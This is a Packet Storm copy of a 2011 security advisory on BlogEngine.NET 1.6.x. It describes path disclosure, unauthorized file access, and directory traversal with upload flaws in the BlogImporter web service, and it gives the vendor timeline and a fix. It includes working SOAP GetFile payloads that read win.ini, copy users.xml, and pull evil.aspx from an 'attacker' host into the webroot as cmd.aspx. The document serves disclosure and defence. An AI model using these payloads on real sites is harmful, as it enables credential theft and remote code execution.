what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BlogEngine.NET Unauthorized Access / Directory Traversal

BlogEngine.NET Unauthorized Access / Directory Traversal
Posted Jan 5, 2011
Authored by Deniz Cevik

BlogEngine.NET version 1.6.x suffers from path disclosure, unauthorized access, directory traversal, and file upload vulnerabilities.

tags | exploit, vulnerability, file inclusion, file upload
SHA-256 | 2218806e3d191f516f3002551168e102ee120af9f6953f1384c30b96f3413f98

BlogEngine.NET Unauthorized Access / Directory Traversal

Change Mirror Download
Product: BlogEngine.NET
Vendor informed: 24 Sep 2010
Fixed Version Released: 01 Jan 2011
Affected Versions: 1.6.x and prior versions
Severtiy: Critical
Impact: Information Discloure and System Compromise

Description:

BlogEngine.NET is an open source .NET blogging project that was born
out of desire for a better blog platform. A blog platform with less
complexity, easy customization, and one that takes advantage of the
latest .NET features. We discovered several security problems in
/api/BlogImporter.asmx web service which comes with default
BlogEngine.NET installation.

1- Path Disclose - Several functions of blogimporter.asmx such as
AddComment or AddPost may reveal local path information of
applications stored. A remote user can use this info to determine the
full path of the web root directory.

2- Unauthorized Access - "Source" parameter of GETFILE function may
allow to access the files outside of the webroot directory. Attackers
can use this problem to identify whether file is exist or not, or
finding locations of system/configuration files such as win.ini,
web.config etc. If the file exists in the requested path, application
returns "true", if not exists application returns "false" messages in
the http response. Sample portion of SOAP request which is causing the
problem is as below.

<GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\Windows\win.ini</source>
<destination>string</destination>
</GetFile>

3- Directory Traversal and File Upload – "destination" parameter of
GETFILE function prone to directory traversal attack with /../../
sequence. Using this problem it is possible to upload files from
remote sites to outsite of the App_Data/files directory which is
normally cannot be accessible by web users, open important local
configuration files (such as web.config, or App_Data/users.xml),
seeing source code of applications, execute os commands via uploaded
applications. This problem may allow an unauthorized users to fully
compromise the target system.

<GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\webroot\blog\App_Data\users.xml</source>
<destination>../../aa.txt</destination>
</GetFile>

<GetFile xmlns="http://dotnetblogengine.net/">
<source>http://attacker/evil.aspx</source>
<destination>/../../cmd.aspx</destination>
</GetFile>

Solution:

Upgrade to BlogEngine.Net 2.0 or remove /api/BlogImpoter.asmx.

Deniz CEVIK
Best Regards
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close